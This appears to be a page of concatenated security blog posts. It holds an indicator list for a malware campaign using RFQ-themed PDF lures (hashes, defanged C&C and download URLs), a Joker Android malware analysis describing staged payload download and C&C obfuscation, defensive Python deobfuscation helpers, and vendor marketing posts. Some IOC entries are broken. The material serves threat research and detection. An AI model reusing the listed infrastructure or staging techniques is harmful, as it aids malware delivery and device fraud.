C:\Users\User\AppData\Roaming\YJSlNpkH.Exe C:\Users\User\AppData\Roaming\WWOsRUUn.Exe C:\Users\user\AppData\Roaming\NcojkRtJmDPru.exe File hashes PDF hashes Author: Donor1 e368837a6cc3f6ec5dfae9a71203f2e2 741f66311653f41f226cbc4591325ca4 fe928252d87b18cb0d0820eca3bf047a 8fe5f4c646fd1caa71cb772ed11ce2e5 d8e3637efba977b09faf30ca49d75005 c4380b4cd776bbe06528e70d5554ff63 34cae3ae03a2ef9bc4056ca72adb73fc 363030120a612974b1eb53cc438bafcb 2710cc01302c480cd7cd28251743faf0 1693f1186a3f1f683893b41b91990773 7a016c37fa50989e082b7f1ca2826f04 709895dd53d55eec5a556cf1544fc5b9 5d9ed128316cfa8ee62b91c75c28acd1 c2ac9c87780e20e609ba8c99d736bec1 269cfd5b77ddf5cb8c852c78c47c7c4c 653f85816361c108adc54a2a1fadadcf 6944f771f95a94e8c1839578523f5415 8e5c562186c39d7ec4b38976f9752297 3d019ede3100c29abea7a7d3f05c642b 67f178fd202aee0a0b70d153b867cb5e 39598369bfca26da8fc4d71be4165ab4 70a92fdba79eaca554ad6740230e7b9a 9db3d79403f09b3d216ee84e4ee28ed3 bafdeef536c4a4f4acef6bdea0986c0b 8d7785c8142c86eb2668a3e8f36c5520 653e737fd4433a7cfe16df3768f1c07e ebdcb07d3de1c8d426f1e73ef4eb10f4 d258ba34b48bd0013bfce3308576d644 a74c619fd61381a51734235c0539e827 6f1bd3cb6e104ed6607e148086b1e171 cf04d33371a72d37e6b0e1606c7cd9a2 ede5fa9b9af1aeb13a2f54da992e0c37 5321cd5b520d0d7c9100c7d66e8274e1 de521f9e4bc6e934bb911f4db4a92d36 36e5726399319691b6d38150eb778ea7 1c5cb47fd95373ade75d61c1ae366f8b b7b41d93709777780712f52a9acf7a26 62a05b00c7e7605f7b856c05c89ee748 b520f4f9d87940a55363161491e69306 40c1156d98c39ac08fd925d86775586d Author: Mr. 
Adeel
f2319ddb303c2a5b31b05d8d77e08b4e
24e67f40ccb69edb88cc990099ef2ffe
54fc7650a8b5c1c8dc85e84732a6d2c7
9cf615982d69d25b1d0057617bd72a95
e9dfa14e4f6048b6f3d0201b2f3c62fe
abab000b3162ed6001ed8a11024dd21c
5c857bf3cf52609ad072d6d74a4ed443
73ddf9f8fc3dc81671ea6c7600e68947
3510cbf8b097e42745cfb6782783af2b
694a6568b7572125305bdb4b24cebe98
7fa5028f2394dcea02d4fdf186b3761f
2260d015eacdc14e26be93fbc33c92aa
d51d5e4c193617fa676154d1fe1d4802
912dbb9e0400987c122f73e0b11876c0
0f4cd9e8111d4eeda89dbe2ce08f6573
d03fb3e473bd95c314987a1b166a92ed
549a06cb43563dad994b86e8f105323a
80149a26ee10786d6f7deaf9fb840314
c7ced41f38b2d481d1910663a14fbec4
3ce6cc6dee4563eb752e55103cdb84d4

ZIP hashes
6d0241bc7d4a850f3067bc40124b3f52
cdfde809746759074bcd8ba54eb19ccd
40b5976eb7ddd1d372e34908f74ba0c4
93c8ed2915d8a3ff7285e0aa3106073e
2b719eeca275228fbead4c1d3016b8e4

Exe hashes
42aec0b84a21fa36fc26b8210c197483
02ae44011006e358a3b1ccbd85ba01f2
131772a1bb511f2010da66c9c7dca32f
7860c138e3b8f40bfb6efec08f4a4068
3bcbe4d2951987363257a0612a107101
328aa4addb7e475c3721e2ae93391446
84e7b5a60cd771173b75a775e0399bc7
3c83b0fe45e15a2fd65ed64a8e1f65e9
f626e64f57d3b8c840a72bbfbe9fb6ca
fcf7a9b93cffddf0a242a8fc83845ee3

Unpacked file hashes
0988195ab961071b4aa2d7a8c8e6372d - Aphrodite
ae5f14478d5e06c1b2dc2685cbe992c1 - Jupiter
38360115294c49538ab15b5ec3037a77 - Azorult

Unique PDF file names
Author: Donor1
RFQ #88556524.pdf
ADNOC RFQ 97571784 - Purchase - core store Mussafah - Tehnical and Commercial.pdf
ALJABER-GROUP-RFQ-38982254237312018-848000071984-03-19-Rev-1.1.pdf
Dalma Gas Development Project (Package B) -TENDER BULLETIN-01.pdf
RFQ-VENDOR 3 YEARS SUPPLY CONTRACT (RENEWAL OF LTPA 62431092).pdf
Author: Mr. Adeel
RFQ-ALJ-HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA.pdf
RFQ-HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA QATAR.pdf
RFQ-HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA.pdf
RFQ#ENQ34640-ALJ24.pdf
AJC-QA HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA.pdf

C&C servers
hxxp://crevisoft[.]net/images/backgrounds/ob/index.php
hxxp://nsseinc[.]com/lingo/index.php

Email address

ZIP hosted URLs:
Author of PDF: Donor1
hxxps://we[.]tl/t-lBcWz3Rcbs
hxxps://mega[.]nz/#!Ov41xapb!M-COPorpfcQ7j1G61afFVruLbDVwzNfujRIwERqlIQw
hxxps://we[.]tl/t-P2Lt34YUcf
hxxps://we[.]tl/t-7XwI9xNjQj
hxxps://we[.]tl/t-AgAdhMTWIm
hxxps://mega[.]nz/file/fkImWKab#zvyeMmsYgGiu-hK-FT0o4OBozg0r4gWPRUtAr6iRvwM
hxxps://we[.]tl/t-utJr50o6uf
hxxp://bit[.]ly/32qQFah
hxxps://mega[.]nz/file/zsIB2aLK#pyTNpp8H4pZhpq0i7w0OB8itu3Rj_02n9BksARDrlzc
hxxps://mega[.]nz/#!nrozSBoL!Pc5ApemPW46RC8b0kgiTIyuIa0MnQV9GDUPXGK8__LM
hxxps://we[.]tl/t-TbbBN9VnEZ
hxxps://mega[.]nz/#!KuRElKZT!5F_FfxkyPI7tvJ-mnL7LppAU5X5wA1XbpTM-z8DpVB8
hxxps://mega[.]nz/file/q55WVIKB#zm3CTH6XEv63mwacATKpo2AMe7yjFmp-KpQXUBkhZJ4
hxxp://bit[.]ly/3a3CwSX
hxxps://we[.]tl/t-MFcMWYK7HL
hxxps://mega[.]nz/#!Tmw0EK5Q!zSLa_Ell7Ti5sz-ca-plgqc4vZM7S813Hb9Yk5Jk81Y
hxxps://we[.]tl/t-0NlciPHf5y
hxxps://mega[.]nz/#!y6w1BAqS!DMfA221sRvIyqVqPNhsKMZEAtBNkjY_jLUWEmCpxMfo
hxxps://mega[.]nz/#!j2JSwQYb!LaAP2L2WBKLU3DlR6BViQxZ4b8fsmt53Hl3RKHMfb4w
hxxps://mega[.]nz/file/Ptp1CL6R#EvbG9Gh435cDmmXXyU1_l4dM3Bq9fP2B8VdjirGiK_c
hxxps://we[.]tl/t-feLBFQVV1P
hxxps://we[.]tl/t-ad5X6peqHj
hxxps://www[.]dropbox[.]com/s/cym2723azwnb364/ADNOC%202020%20REQUEST%20FOR%20QUOTATION-REQUEST%20FOR%20TENDER%20CODE%2076384_pdf[.]zip?dl=0
hxxps://we[.]tl/t-uwwupT1WNc
hxxps://mega[.]nz/#!K6xgGCYJ!1cJY91IlILLrGGrDVVrkbb7vNRKL9CAFD4tB9_jP8ts
hxxps://mega[.]nz/#!yrBGmQBA!EhgekpU4VUafMvfJKlNVFej1KsgxYWv1mfzCKXejjEc
hxxps://we[.]tl/t-ZcyzrvcBkP
hxxps://mega[.]nz/file/GpB3VIyS#3-tKCJ8d-y782IN0570wHMMKQ244ttzBRpUmFXh6LZQ
hxxps://mega[.]nz/#!OvJFjQaY!UBgEDtTE_Gn4B4vYrn-d7rYeO5CBMTxt83NyXQGWh0E
hxxps://mega[.]nz/file/G5YmjCYJ#jvqrZX2ZLXn3SAI9nzf8w6mWtxTM4_fwx7VzHdqzfqM
hxxps://mega[.]nz/#!zygWnKAS!5kp8IWNec2HK-YPK2gk-hmLa416PZLtr6VpbNZediSk
hxxps://mega[.]nz/#!uu40wQxJ!HXlLJw7KDJgqnpwCzgrnBt9vu_W1-FZlSIvn0JU5rDw
hxxps://mega[.]nz/#!66hWzACL!_6klTwfD-JaSkwjWrKRIBqX1ghXr-SZGk1Utc2-VJPc
hxxps://www[.]aljaber-llc[.]com/projects/files/ALJABER-RFQ-38982254237312018-848000071984-04-23-Rev-1[.]1[.]zip
hxxps://we[.]tl/t-cJa4jY9Egz
hxxps://we[.]tl/t-Out44emJ9t
hxxps://we[.]tl/t-QuCLQY3cTh
hxxps://we[.]tl/t-nMKuKWbMlE
hxxps://mega[.]nz/file/f1RTVa4A#2uGmQV64RKkNYZEECYXFKjGPS-nalF2ZshufSgqsA_k
hxxps://we[.]tl/t-oAkwGNORsR
hxxps://we[.]tl/t-cFvm5QQlyV
hxxps://www[.]dropbox[.]com/s/5b0bti9r6xhf3pq/ADNOC%202020%20REQUIREMENT%20TENDER%20RFQ%2056774387_PDF[.]zip?dl=0
hxxps://we[.]tl/t-Didobux8kG
hxxps://we[.]tl/t-FkBOHwy1ME
hxxps://mega[.]nz/file/u7xRlS7T#I8L3NL_zi-JizZagSF-E1Gcj5I8ednV6YdqyWs5RnNo
hxxps://we[.]tl/t-XsVO5hewBu
Author of PDF: Mr. Adeel
hxxps://we[.]tl/t-NwSigkLd2E
hxxps://we[.]tl/t-wQB6ioE8dL
hxxps://we[.]tl/t-u3NL7Wnplr
hxxps://we[.]tl/t-zC6Wz4CpfZ
hxxps://we[.]tl/t-5wQSJsFUlC
hxxps://we[.]tl/t-egfvdBvESW
hxxps://we[.]tl/t-2a9aq4LJSn
hxxps://we[.]tl/t-4BnTk2Hwiv
hxxps://we[.]tl/t-hSqtTJDi1f
hxxps://we[.]tl/t-1VyVEAtzAf
hxxps://we[.]tl/t-E1iDs5Bghr
hxxps://we[.]tl/t-YlbV0AIU5b
hxxps://we[.]tl/t-1yLti4IfaN
hxxps://we[.]tl/t-dGN9sRTnch
hxxps://we[.]tl/t-spOqYklJIQ
hxxps://we[.]tl/t-cunxjPBouY
hxxps://we[.]tl/t-39SvbwCY2E
hxxps://we[.]tl/t-9RVc3dflK6
hxxps://we[.]tl/t-aBUVx3EMdx
hxxps://we[.]tl/t-XdOjUbrcK8
hxxps://we[.]tl/t-MkUZugwABd
hxxps://we[.]tl/t-ikxwkPtSBi
hxxps://we[.]tl/t-1hWeuMe1h7
hxxps://we[.]tl/t-2L7ajlJSCG
hxxps://we[.]tl/t-HZygDd5TUJ
hxxps://we[.]tl/t-MtgNnMbTij
Sudeep Singh

Joker Playing Hide-and-Seek with Google Play
Joker is one of the most prominent malware families that continually targets Android devices.
Despite awareness of this particular malware, it keeps finding its way into Google’s official application market by changing its code, its execution methods, or its payload-retrieving techniques. This spyware is designed to steal SMS messages, contact lists, and device information, and to silently sign the victim up for premium wireless application protocol (WAP) services.

Our Zscaler ThreatLabZ research team has been constantly monitoring the Joker malware. Recently, we have seen regular uploads of it onto the Google Play store. Once notified by us, the Google Android Security team took prompt action to remove the suspicious apps (listed below) from the Google Play store. This prompted us to evaluate how Joker is so successful at getting around the Google Play vetting process.

We identified 17 different samples regularly uploaded to Google Play in September 2020, with a total of around 120,000 downloads across the identified malicious apps. The following are the names of the infected apps we discovered on the Google Play store:

All Good PDF Scanner
Mint Leaf Message-Your Private Message
Unique Keyboard - Fancy Fonts & Free Emoticons
Tangram App Lock
Direct Messenger
Private SMS
One Sentence Translator - Multifunctional Translator
Style Photo Collage
Meticulous Scanner
Desire Translate
Talent Photo Editor - Blur focus
Care Message
Part Message
Paper Doc Scanner
Blue Scanner
Hummingbird PDF Converter - Photo to PDF
Powerful Cleaner

(As of this writing, all of these apps have been removed from the Google Play store.)

In this blog, we will discuss the tactics used by the Joker malware author to bypass the Google Play vetting process.

Scenario 1: Direct download
In some of the Joker variants, we saw the final payload delivered via a direct URL received from the command and control (C&C) server. In this variant, the infected Google Play store app has the C&C address hidden in the code itself with string obfuscation.
We observed that the string “sticker” was used to break up the C&C address and hide it from a simple grep or string search, as shown in Figure 1.
Figure 1: The C&C address string obfuscation.
Once installed, the infected app contacts the C&C server, which responds with the URL of the final payload. The JSON response also names the class inside the final payload that must be executed to carry out the malicious activity.
Figure 2: The C&C JSON response.
Upon receiving the JSON configuration from the C&C, the infected app downloads the payload from the received location and executes it.
Figure 3: The final payload download.

Scenario 2: One-stage download
In some apps, we observed that the infected Google Play app retrieves the final payload through a stager payload. Here the stager payload URL is embedded in the app’s code, encrypted with the Advanced Encryption Standard (AES). Upon infection, unlike scenario 1, the app downloads the stager payload rather than the final payload, as seen in Figure 4 and Figure 5. We also saw two varieties of the stager payload: an Android Package (APK) or a Dalvik executable (DEX) file.
Figure 4: The Dalvik executable stager payload download.
Figure 5: The APK stager payload download.
The job of this stager payload is simply to retrieve the final payload URL from its own code, download the final payload, and execute it. In the stager payload we also saw different tactics used by the malware author to hide the final payload URL: in some instances it is encrypted with AES, in some cases a simple shift operation is used, and in some cases the URL is in plain text.
Figure 6: AES encryption for the end payload URL.
Figure 7: The plain text end payload URL.
Figure 8: The plain text end payload URL.
Figure 9: The obfuscated end payload URL with shift encoding.
Upon execution, the stager downloads the final stage payload, which is the core Joker malware that carries out all the infection activities, from the premium SMS subscription scam to spyware, as seen in Figure 10.
Figure 10: The end payload download.

Scenario 3: Two-stage download
In some groups of infected Google Play store apps, we saw two stager payloads used to reach the final payload: the infected app downloads the stage one payload, which downloads the stage two payload, which finally loads the end Joker payload. Interestingly, unlike the previous two scenarios, the infected app contacts the C&C server for the stage one payload URL, and the server hides that URL in the Location header of its response.
Figure 11: The C&C response for the stage one payload URL.
Upon infecting the device, the infected app downloads the stage one payload from the URL received in the C&C response header. As in scenario 2, the job of this payload is simply to download another payload, but this time it is not the final payload, as the screenshot below shows.
Figure 12: The stage two URL in stage one code.
Upon execution, the stage one payload downloads the stage two payload. The stage two payload behaves the same way as stage one: it contains a hard-coded URL from which it retrieves the final payload, as shown in Figure 13.
Figure 13: The final payload URL in the stage two code.

Final payload details
Although Joker used these variations to reach the end payload, we saw the same end payload downloaded in all cases. Here are some highlights of its activities. The final payload encrypts its C&C traffic with DES.
Figure 14: The DES encryption for the C&C post request.
Figure 15 shows the network pattern Joker uses for its C&C POST requests.
Figure 15: The C&C pattern for the post request.
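As an added example (not code from the original post, from Zscaler, or from the Joker samples), the Python helpers below reverse the two URL-hiding tricks described in scenarios 1 and 2: stripping a junk token such as “sticker” out of string literals in decompiled code, and brute-forcing a byte-wise shift of the kind shown in Figure 9. The byte-wise additive shift is an assumption about the form of the “simple shift operation”; the decompiled snippet, the shifted bytes, and the example.com and example.net hosts are constructed for this example.

```python
"""Recover URLs hidden by a spliced junk token or a byte-wise shift.

Added example for this page; not code from the Joker samples or from Zscaler.
All inputs below are constructed and the hostnames are placeholders.
"""
import re
import string
from typing import List, Optional, Tuple

URL_RE = re.compile(r"^https?://[A-Za-z0-9.\-]+(?:/[^\s\"']*)?$")
# Printable ASCII minus control whitespace: a recovered URL must stay inside it.
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")
# Double-quoted string literals as they appear in decompiled Java or smali.
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def strip_junk_token(value: str, token: str) -> str:
    """Undo the split. The dropper does the equivalent of replace(token, "")
    at runtime, so the same operation hands the analyst the real string."""
    return value.replace(token, "")


def scan_decompiled(source: str, token: str) -> List[str]:
    """Return every string literal that becomes a well-formed URL once the
    junk token is removed. A plain grep for "http" or the domain misses these
    because the URL is never present contiguously."""
    hits = []
    for literal in LITERAL_RE.findall(source):
        if token not in literal:
            continue
        candidate = strip_junk_token(literal, token)
        if URL_RE.match(candidate):
            hits.append(candidate)
    return hits


def recover_shifted_url(data: bytes) -> Optional[Tuple[int, str]]:
    """Brute-force a byte-wise additive shift (assumed form of the 'simple
    shift operation'): try all 256 shifts and return (shift, url) for the one
    that yields a printable http(s) URL, or None if no shift does."""
    for shift in range(256):
        plain = bytes((b - shift) & 0xFF for b in data)
        try:
            text = plain.decode("ascii")
        except UnicodeDecodeError:
            continue
        if text.startswith(("http://", "https://")) and set(text) <= PRINTABLE:
            return shift, text
    return None


def shift_encode(url: str, shift: int) -> bytes:
    """Malware-side encoding, used here only to build the constructed sample."""
    return bytes((b + shift) & 0xFF for b in url.encode("ascii"))


# Constructed decompiled snippet (not from a real sample): "sticker" is
# spliced into the C&C URL three times and stripped again at runtime.
SAMPLE_SOURCE = '''
    private static final String A = "htstickertp://c2.exstickerample.com/api/instickerdex.php";
    private static final String TITLE = "Sticker pack loaded";
    String url = A.replace("sticker", "");
'''

# Constructed shift-encoded final payload URL (every byte shifted by 7).
SAMPLE_SHIFTED = shift_encode("http://payload.example.net/final.apk", 7)

if __name__ == "__main__":
    print(scan_decompiled(SAMPLE_SOURCE, "sticker"))
    print(recover_shifted_url(SAMPLE_SHIFTED))
```

The scan is driven by the token rather than by a URL pattern because the URL itself never appears contiguously in the binary; once the token for a given family or payload is known (the final payload described further down uses a different one), the same strip_junk_token call applies to it.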
The end payload also employs string obfuscation to hide all the important strings. It uses the string “nus106ba” to break up those strings and hide them from a simple string search.
Figure 16: The string obfuscation.
Figure 17 shows the SMS harvesting and WAP fraud done by Joker.
Figure 17: The WAP fraud.
This post provides in-depth details related to the end payload activities done by Joker.

Recommendation
We recommend paying close attention to the permission list of the apps you install on your Android device. Always watch out for risky permissions related to SMS, call logs, contacts, and more. Reading the comments or reviews on the app page also helps identify compromised apps.

IOCs
Infected apps on Google Play (MD5, followed by the package name where the post lists one):
2086f0d40e611c25357e8906ebb10cd1
b8dea8e30c9f8dc5d81a5c205ef6547b  com.docscannercamscanpaper
5a5756e394d751fae29fada67d498db3  com.focusphoto.talent.editor
8dca20f649f4326fb4449e99f7823a85  com.language.translate.desire.voicetranlate
6c34f9d6264e4c3ec2ef846d0badc9bd  com.nightsapp.translate.sentence
04b22ab4921d01199c9a578d723dc6d6  com.password.quickly.applock
b488c44a30878b10f78d674fc98714b0
a6c412c2e266039f2d4a8096b7013f77
4c5461634ee23a4ca4884fc9f9ddb348
e4065f0f5e3a1be6a56140ed6ef73df7  pdf.converter.image.scanner.files
bfd2708725bd22ca748140961b5bfa2a  message.standardsms.partmessenger
164322de2c46d4244341e250a3d44165
88ed9afb4e532601729aab511c474e9a
27e01dd651cf6d3362e28b7628fe65a4
e7b8f388051a0172846d3b3f7a3abd64  prisms.texting.messenger.coolsms
0ab0eca13d1c17e045a649be27927864
bfbe04fd0dd4fa593bc3df65a831c1be

URLs of payload distribution
blackdragon[.]oss-ap-southeast-5[.]aliyuncs[.]com/privateSMS_ba[.]htm
blackdragon03[.]oss-ap-southeast-5[.]aliyuncs[.]com/partMessage_base[.]css
blackdragon03[.]oss-ap-southeast-5[.]aliyuncs[.]com/partMessage_config[.]json
nineth03[.]oss-ap-southeast-5[.]aliyuncs[.]com/MeticulousScanner_bs[.]mp3
sahar[.]oss-us-east-1[.]aliyuncs[.]com/care[.]asf
sahar[.]oss-us-east-1[.]aliyuncs[.]com/onesentence[.]asf
sahar[.]oss-us-east-1[.]aliyuncs[.]com/onesentence2[.]asf
sahar[.]oss-us-east-1[.]aliyuncs[.]com/saiks[.]asf
sahar[.]oss-us-east-1[.]aliyuncs[.]com/tangram[.]asf
sahar[.]oss-us-east-1[.]aliyuncs[.]com/tangram2[.]asf
sahar[.]oss-us-east-1[.]aliyuncs[.]com/twinkle[.]asf
2j1i9uqw[.]oss-eu-central-1[.]aliyuncs[.]com/328718737/armeabi-v7a/ihuq[.]sky
blackdragon[.]oss-ap-southeast-5[.]aliyuncs[.]com/blackdragon[.]html
blackdragon[.]oss-ap-southeast-5[.]aliyuncs[.]com/privateSMS[.]json
fgcxweasqw[.]oss-eu-central-1[.]aliyuncs[.]com/fdcxqewsswq/dir[.]png
jk8681oy[.]oss-eu-central-1[.]aliyuncs[.]com/fsaxaweqwa/amly[.]art
n47n[.]oss-ap-southeast-5[.]aliyuncs[.]com/H20PDF29[.]txt
n47n[.]oss-ap-southeast-5[.]aliyuncs[.]com/font106[.]ttf
nineth03[.]oss-ap-southeast-5[.]aliyuncs[.]com/blackdragon[.]html
proxy48[.]oss-eu-central-1[.]aliyuncs[.]com/m94[.]dir
proxy48[.]oss-eu-central-1[.]aliyuncs[.]com/response[.]js
laodaoo[.]oss-ap-southeast-5[.]aliyuncs[.]com/allgood2[.]webp
laodaoo[.]oss-ap-southeast-5[.]aliyuncs[.]com/flower[.]webp
rinimae[.]oss-ap-southeast-5[.][.]mov
rinimae[.]oss-ap-southeast-5[.][.]mov
rinimae[.]oss-ap-southeast-5[.][.]mov

Final C&C:
161[.]117[.]229[.]58
161[.]117[.]83[.]26
47[.]74[.]179[.]177
Viral Gandhi

Rethinking Security for Today’s Workforce with Zscaler Internet Access
In light of COVID-19, more employees are working remotely than ever before. While work-from-anywhere is beneficial from a health and safety standpoint, it has required IT departments to adapt their infrastructures to be more resilient, keeping business moving forward with minimal disruption while preparing for new, evolving risks and future uncertainties. For instance, as the volume of remote users grows, VPN instability increases, which drives users to take business off-network, connecting directly to cloud apps, away from security controls.
Additionally, there are now many threats explicitly targeting people working remotely, including quite a few that use COVID-related lures to deliver malware. For IT leaders, tackling these emerging challenges requires a new, flexible approach to protecting remote employees and their data. With Zscaler Internet Access (ZIA), including Cloud Firewall, Cloud Sandbox, and Cloud DLP, businesses can secure their employees no matter their location or device, enabling fast, direct-to-internet connections while protecting against breaches and data exfiltration, all at a fraction of the cost of traditional approaches. Let’s take a closer look at how these solutions combine to give your users the freedom to work anywhere, securely.

Secure all connections with Zscaler Client Connector
Zscaler Client Connector is the cornerstone of fast, secure connections regardless of user location. Before the user’s device connects to the internet, Zscaler Client Connector establishes a secure connection to the Zscaler cloud. By leveraging Z-tunnel 2.0, all traffic, ports, and protocols are proxied through Zscaler for inspection, which results in fast, secure direct-to-application experiences for users without the need for a performance-hindering VPN.

Identical protection on- and off-network with Advanced Cloud Firewall
When people work remotely, they use different applications and exhibit different browsing behavior and internet activity than they would on-network. Because traditional firewalls do not protect off-network users, the chance of getting infected with malware increases significantly.
In today’s work-from-anywhere environment, it’s critical for organizations to address these differences in user behavior and to be able to extend their corporate policies to off-network connections, such as blocking BitTorrent and remote-access tools like RDP and TeamViewer, regardless of port or protocol, user device or location, evasion tactics, or SSL encryption. With Zscaler Advanced Cloud Firewall and Z-tunnel 2.0, you can apply identical protection with a single, consistent policy, wherever your users connect.

Always-on advanced threat protection with Cloud Sandbox
Users are most vulnerable to ransomware and other attacks when off-network and away from a secure gateway. To protect these off-network users, Zscaler Cloud Sandbox is a must for uncovering and preventing the delivery of advanced targeted attacks. With Zscaler's Advanced Cloud Sandbox, the delivery of unknown files can be halted until they are confirmed clean, reducing the likelihood of patient-zero attacks, which are becoming more popular with attackers looking for backdoors into a corporate network. Additionally, complete SSL inspection enables you to inspect every byte of traffic, allowing you to uncover hidden threats before they can reach your users.

Cloud DLP prevents data exfiltration—everywhere
Data loss, intentional or unintentional, can create a nightmare for security and compliance teams, especially if the data exfiltrated is confidential or sensitive. Zscaler Cloud DLP prevents this from happening while eliminating blind spots by leveraging native SSL inspection capabilities. Also, Zscaler Exact Data Match technology aids compliance by automatically identifying personal information to keep it protected from exposure and exfiltration. All of this combines to not only strengthen your security posture but also to meet today's stringent compliance standards.
With Zscaler Internet Access, Cloud Firewall, Cloud Sandbox, and Cloud DLP, not only will your business be well-equipped to secure employees, wherever they’re connecting, but you will also have the infrastructure in place to scale work-from-anywhere. Furthermore, this improvement in security posture can be achieved without negatively affecting user experiences, and without the cost of adding and managing more hardware as capacity needs grow. Zscaler has already helped thousands of customers embrace the new work-from-anywhere reality by enabling them to stay resilient while keeping their employees productive and, more importantly, safe. Learn more about how Zscaler Internet Access supports your work-from-anywhere efforts.
Jen Toscano is a Sr. Product Marketing Manager at Zscaler
Jen Toscano

Identity-Based Microsegmentation is Foundational to Cloud Security: Don’t Get Spoofed.
Identity-based microsegmentation has rapidly become accepted as a best practice for cloud security and enabling zero trust. In Gartner’s April 2020 report, Market Guide for Cloud Workload Protection Platforms (Gartner subscription required), analysts Neil MacDonald and Tom Croll write: “Some vendors focus exclusively on microsegmentation. In all cases, the solution should support the growing requirement for identity-based “microsegmentation” (more granular, software-defined segmentation also referred to as zero trust network segmentation) of east/west traffic in data centers.” Additionally, identity-based segmentation and network visibility is identified as a foundational control on Gartner’s Risk-Based Hierarchy of Workload Protection Controls. When platforms claim to build zero trust policies using identity, it is critical to ensure they are not just slapping a label on firewall-based policies, which carry all the same security risks as a legacy solution that builds policies based on network addresses.

Identity-based microsegmentation vs. legacy methods
Identity is the key to effective zero trust policies. Most microsegmentation and zero trust solutions are based on firewalls, which rely on network addresses. That’s a problematic approach for many reasons. First, networks change constantly, which means policies tied to the network need to be continually updated as applications and devices move. That’s difficult enough to do in a data center, but it’s effectively impossible in the cloud and other autoscaling environments where IP addresses are ephemeral. The even bigger problem with using network address-based approaches for segmentation is that these tools cannot identify *what* is communicating (i.e., the identity of the software that is communicating); they can only tell you *how* it is communicating (e.g., from what IP address, port, or protocol). It’s as if the FBI intercepted a conversation between two suspected spies, and as soon as they verify that their suspects are speaking in English (i.e., protocol) over a domestic cellular network (e.g., the devices), the agents assume that these communications are completely innocent without at all considering the identities of the spies. That’s almost exactly what network-based security systems do. They only look at the protocol and the network address. So long as they are deemed “safe,” communications are allowed, even though IT has no idea exactly what is trying to communicate. Another benefit to an identity-based approach is that it greatly simplifies policy management for microsegmentation—you can protect a segment with as few as seven identity-based policies vs. hundreds of address-based rules. To illustrate, let’s take a typical environment with 15 billion network events. If we “uniquify” these and eliminate redundant events, that number will drop down to one to two million unique network events. But we can go further—let’s de-duplicate those one to two million events based on similar apps (i.e., using identity) with similar interactions.
Now we drop down to 267,000, but we’re not done. Let’s use machine learning (ML) to reduce it further via similarity scoring. That brings us to 40,000 unique interactions, which can be codified into fewer than 100 identity-based policies for the entire environment vs. tens of thousands of address-based rules. When you look at interactions on a network, you’ll see a lot of randomness—this address to that address over this port—which appears to be a massive, unwieldy, and complicated mess of interactions. You could never achieve a microsegmentation outcome just by looking at it. But by using ML and identity, IT can compress it all down to a very small set of manageable policies. Using identity makes microsegmentation a solvable problem.

How Zscaler implements identity-based zero trust
Zscaler Workload Segmentation begins by mapping the application communication topology using ML, a process that takes about 72 hours (a huge improvement over the months it takes to perform manually). Once complete, we can measure the total network paths available and the application paths that are actually required by the business applications. Typically, only a fraction of pathways is required. We can eliminate all unnecessary communications paths to reduce the attack surface—typically, our ML algorithm can shrink the number of paths by about 90 percent, while ensuring full coverage of the environment. To enable identity-based microsegmentation, each device and software asset is assigned an immutable, unique identity based on dozens of properties of the asset itself, such as a SHA-256 hash of a binary or the UUID of the BIOS. Identities extend down to the subprocess level, so we can uniquely identify even individual Java JAR files and Python scripts. Identity creation and management is fully automated to simplify operations. Zscaler verifies the identities of communicating software in real time. This zero trust approach prevents unapproved and malicious software from communicating.
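To make the two points above concrete (a process piggybacking on an approved firewall rule, and rules that break when addresses change), here is an added illustration in Python. It is not Zscaler’s implementation or code from the original post: the identity derivation is a toy that combines only a BIOS UUID and a binary hash, and the hosts, binaries, subnet and flows are all constructed for the example.

```python
"""Address-based rule next to an identity-based rule for the same flows.

Added example for this page, not Zscaler's implementation. The identity
derivation, hosts, binaries and flows are constructed stand-ins.
"""
import hashlib
import ipaddress
from dataclasses import dataclass
from typing import Set, Tuple


def software_identity(host_uuid: str, binary: bytes) -> str:
    """Toy identity: SHA-256 over the host's BIOS UUID and the SHA-256 of the
    binary. The post describes real identities as built from dozens of such
    properties; two are enough to show the mechanism."""
    digest = hashlib.sha256(binary).digest()
    return hashlib.sha256(host_uuid.encode("ascii") + b"|" + digest).hexdigest()


@dataclass(frozen=True)
class Flow:
    """One connection attempt as an endpoint agent would report it: network
    details plus the verified identities of both communicating programs."""
    src_ip: str
    dst_ip: str
    dst_port: int
    src_identity: str
    dst_identity: str


# --- constructed assets (placeholders, not real hosts or binaries) ---
WEB_HOST_UUID = "6c1f0a52-web-frontend-host"
DB_HOST_UUID = "9e3b7d10-database-host"
WEB_BINARY = b"web-frontend build 1.2.3"
DB_BINARY = b"postgres 13"
IMPLANT_BINARY = b"dropped implant"

WEB_ID = software_identity(WEB_HOST_UUID, WEB_BINARY)
DB_ID = software_identity(DB_HOST_UUID, DB_BINARY)
# Same host as the web app, different binary: a different identity.
IMPLANT_ID = software_identity(WEB_HOST_UUID, IMPLANT_BINARY)

# Legacy rule: the web subnet may reach the database at 10.0.2.10:5432.
WEB_SUBNET = ipaddress.ip_network("10.0.1.0/24")
DB_ADDRESS = ("10.0.2.10", 5432)

# Identity rule: only the verified web app may talk to the verified database.
IDENTITY_POLICY: Set[Tuple[str, str]] = {(WEB_ID, DB_ID)}


def address_policy_allows(flow: Flow) -> bool:
    """Decides on *how* the traffic moves: source subnet and destination IP:port."""
    return (ipaddress.ip_address(flow.src_ip) in WEB_SUBNET
            and (flow.dst_ip, flow.dst_port) == DB_ADDRESS)


def identity_policy_allows(flow: Flow) -> bool:
    """Decides on *what* is talking; an identity not in the policy never matches."""
    return (flow.src_identity, flow.dst_identity) in IDENTITY_POLICY


def evaluate(flow: Flow) -> Tuple[bool, bool]:
    """(address-rule verdict, identity-rule verdict) for one flow."""
    return address_policy_allows(flow), identity_policy_allows(flow)


# --- constructed flows ---
LEGIT = Flow("10.0.1.5", "10.0.2.10", 5432, WEB_ID, DB_ID)
# An implant on the approved web host reuses the approved source IP and port.
PIGGYBACK = Flow("10.0.1.5", "10.0.2.10", 5432, IMPLANT_ID, DB_ID)
# The same web app after autoscaling moved it to an address outside the rule.
MOVED = Flow("10.0.9.77", "10.0.2.10", 5432, WEB_ID, DB_ID)

if __name__ == "__main__":
    for name, flow in (("legit", LEGIT), ("piggyback", PIGGYBACK), ("moved", MOVED)):
        print(name, evaluate(flow))
```

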